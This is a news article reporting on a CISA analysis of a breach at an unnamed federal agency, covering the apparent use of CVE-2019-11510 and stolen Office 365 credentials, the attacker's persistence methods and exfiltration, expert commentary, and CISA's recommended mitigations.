Federal Agency Hacked Using Stolen Office 365 CredentialsCISA: Hacker Apparently Exploited VPN Vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency has issued a report describing how a threat actor apparently used a well-known VPN vulnerability and compromised Office 365 credentials to gain administrative privileges to a federal agency’s network.
The CISA report, which does not identify the agency, says a highly skilled malicious actor implanted a "sophisticated multistage malware that evaded the affected agency's anti-malware protection and gained persistent access through two reverse Socket Secure proxies that exploited weaknesses in the agency's firewall."
The report does not attribute the attack or say when it occurred. The malware used was capable of exfiltrating data, CISA says, but it does not make clear if data, indeed, was stolen.
Adam Kujawa, director of Malwarebytes Labs, says the hacker likely scoped out the federal agency for some time before the intrusion.
"While much of their operations were hidden due to the use of an SSH connection to a virtual private server, I have to assume that, considering their efforts to find additional VPN passwords, this attack itself may have been for the purpose of information gathering and/or establishing a foothold on this network, rather than any specific form of disruption," Kujawa tells Information Security Media Group.
The hacker like will use the data gleaned from this breach to again attack the same network or a connected network, Kujawa says.
CISA was alerted to the situation through Einstein, the Department of Homeland Security's intrusion detection system that monitors federal civilian networks. CISA launched an immediate investigation to confirm the tactics, techniques and procedures the hackers used and verify the indicators of compromise.
The malicious actor gained a toehold into the federal system using legitimate Office 365 credentials, CISA says. Although the agency has not yet verified how these credentials were obtained, it theorizes that the hacker may have gained access to the credentials by exploiting a well-known vulnerability - CVE-2019-11510 - in a Pulse Secure Server VPN.
"The difficulty is that once a valid credential has been compromised, all subsequent access using that credential will appear normal,” says Ed Amoroso, CEO at the cybersecurity research and consulting firm TAG Cyber. “This is why it takes so much time for systems like Einstein to detect an anomaly by the intruder - and sometimes these systems never detect anything, especially if the adversary is really good."
If exploited, the CVE-2019-11510 vulnerability can enable an unauthenticated remote attacker to send a specially crafted URL to perform an arbitrary file reading that allows the theft of passwords, according to a National Institute of Science and Technology alert.
"CISA has observed wide exploitation of CVE-2019-11510 across the federal government," its report says, noting Pulse Secure issued a patch for this flaw in April 2019.
Office 365 Connection
The attacker, who gained administrative-level privileges, was able to perform a discovery operation into the agency's Office 365 account, where the hacker accessed help desk email attachments with subject lines of "intranet access" and "VPN passwords," according to CISA.
"The actor logged into the same email account via Remote Desktop Protocol from IP address 207.220.1[.]. The actor enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy," CISA says. "Immediately afterward, the threat actor used common Microsoft Windows command line processes - conhost, ipconfig, net, query, netstat, ping, and whoami, plink.exe - to enumerate the compromised system and network."
Persistence and command-and-control was established on the network by:
- Creating a persistent Secure Socket Shell tunnel/reverse SOCKS proxy;
- Running inetinfo.exe - a unique, multistage malware used to drop files;
- Setting up a locally mounted remote share on IP address at 78.27.70[.]237 (Proxy [T1090]).
"This attack is almost old school,” Kujawa says. “The malware utilized to create persistence is barely more than a reverse shell and command-line script. Having an attacker manually infiltrate a network and launch malware is a huge difference from malware designed to infect systems on their own."
With the administration-level privileges, the attacker created a local account from which it collected and exfiltrated data, CISA says. Malicious activities included browsing directories, copying files, creating a connection with the command-and-control server and removing data using zip files.
The CISA report contains several risk mitigation recommendations, including: deploying multifactor authentication, keeping administrative accounts on separate workstations, implementing least privilege access and securing RDP connections.